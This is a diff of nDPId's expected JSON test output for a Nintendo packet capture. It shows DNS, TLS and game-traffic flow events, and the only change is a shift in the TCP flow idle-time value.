00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1500731340826,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1500731340826,"pkt":"AA6OGXEMfLuKifuECABFAAAsEYMAAEARLknAqAxyI55KPdprgjYAGGgmAAAAAAAAAAAAAAAAAAAAAA=="} @@ -68,15 +68,15 @@ 00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1500731341194,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731341194,"pkt":"fLuKifuEAA6OGXEMCABFAAELN\/tAAEARaCPAqAwBwKgMcgA1x1sA9yl7YWmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAPAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAALQAENsAbCMBQAAEAAQAAAC0ABDbAG2jAUAABAAEAAAAtAAQ2wBuuwFAAAQABAAAALQAENsAbSsBQAAEAAQAAAC0ABDbAG1HAUAABAAEAAAAtAAQ2wBsnwFAAAQABAAAALQAENsAbxMBQAAEAAQAAAC0ABDbAG9k="} 00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341201,"flow_last_seen":1500731341201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731341201,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1500731341201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341201,"pkt":"AA6OGXEMfLuKifuECABFAAA8EZZAAEAGCkTAqAxyNsAbCHphAbtX9RrxAAAAAKACgAAP+wAAAgQFUAEDAwYEAggKABqqagAAAAA="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1500731341241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341241,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZtk2wBsIwKgMcgG7emF9lpyBV\/Ua8qAScSBo2gAAAgQFrAQCCAqoOPNAABqqagEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1500731341242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731341242,"pkt":"AA6OGXEMfLuKifuECABFAAA0EZdAAEAGCkvAqAxyNsAbCHphAbtX9RryfZacgoAQAg4GiQAAAQEICgAaqpOoOPNA"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341201,"flow_last_seen":1500731341201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731341201,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1500731341201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341201,"pkt":"AA6OGXEMfLuKifuECABFAAA8EZZAAEAGCkTAqAxyNsAbCHphAbtX9RrxAAAAAKACgAAP+wAAAgQFUAEDAwYEAggKABqqagAAAAA="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1500731341241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341241,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZtk2wBsIwKgMcgG7emF9lpyBV\/Ua8qAScSBo2gAAAgQFrAQCCAqoOPNAABqqagEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1500731341242,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731341242,"pkt":"AA6OGXEMfLuKifuECABFAAA0EZdAAEAGCkvAqAxyNsAbCHphAbtX9RryfZacgoAQAg4GiQAAAQEICgAaqpOoOPNA"} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1500731342849,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342849,"pkt":"AA6OGXEMfLuKifuECABFAABoEaUAAAQRdQ7AqAxyuXapQdpra4AAVCIdMquYZAIAAADswAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4rX5hDUY6wfFQBAZE4XnJazusJzbVQnhevgQppjVzdvQ=="} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} @@ -106,9 +106,9 @@ 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} @@ -121,8 +121,8 @@ 